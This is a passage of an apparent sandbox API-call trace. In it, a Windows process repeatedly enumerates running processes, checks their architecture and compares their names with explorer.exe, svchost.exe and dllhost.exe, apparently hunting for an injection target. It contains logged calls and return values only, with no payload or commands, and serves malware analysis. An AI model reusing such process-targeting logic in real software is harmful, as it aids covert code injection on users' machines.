(lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0260.708] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0260.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0260.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0260.708] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.708] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.708] CloseHandle (hObject=0xec) returned 1 [0260.708] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0260.708] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0260.708] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0260.708] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0260.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0260.709] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.709] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.709] CloseHandle (hObject=0xec) returned 1 [0260.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0260.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0260.709] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0260.709] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0260.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0260.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.710] CloseHandle (hObject=0xec) returned 1 [0260.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0260.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0260.710] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0260.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0260.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0260.710] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.710] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.710] CloseHandle (hObject=0xec) returned 1 [0260.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0260.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0260.710] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0260.710] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0260.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0260.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.711] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.711] CloseHandle (hObject=0xec) returned 1 [0260.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0260.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0260.711] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0260.711] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0260.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0260.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.712] CloseHandle (hObject=0xec) returned 1 [0260.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0260.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0260.712] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0260.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0260.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0260.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.712] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.712] CloseHandle (hObject=0xec) returned 1 [0260.712] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0260.712] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0260.712] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0260.712] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0260.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0260.713] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0260.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0260.714] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0260.715] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0260.715] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.715] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.715] CloseHandle (hObject=0xec) returned 1 [0260.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0260.716] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.716] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.716] CloseHandle (hObject=0xec) returned 1 [0260.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0260.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.717] CloseHandle (hObject=0xec) returned 1 [0260.717] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0260.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0260.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.717] CloseHandle (hObject=0xec) returned 1 [0260.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0260.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0260.718] CloseHandle (hObject=0xec) returned 1 [0260.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0260.719] CloseHandle (hObject=0xe8) returned 1 [0260.719] Sleep (dwMilliseconds=0x3e8) [0261.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0261.754] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0261.755] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0261.755] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0261.756] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0261.756] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0261.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0261.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0261.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0261.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0261.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0261.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0261.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0261.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0261.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0261.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0261.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0261.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0261.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0261.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0261.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0261.763] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.763] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.764] CloseHandle (hObject=0xec) returned 1 [0261.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0261.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0261.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.765] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.765] CloseHandle (hObject=0xec) returned 1 [0261.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0261.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0261.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0261.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0261.766] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.766] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.766] CloseHandle (hObject=0xec) returned 1 [0261.766] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0261.766] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0261.766] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0261.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0261.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0261.767] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.767] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.767] CloseHandle (hObject=0xec) returned 1 [0261.767] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0261.767] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0261.767] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0261.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0261.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0261.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.768] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.768] CloseHandle (hObject=0xec) returned 1 [0261.768] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0261.768] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0261.768] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0261.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0261.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0261.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.768] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.768] CloseHandle (hObject=0xec) returned 1 [0261.768] lstrcmpiA 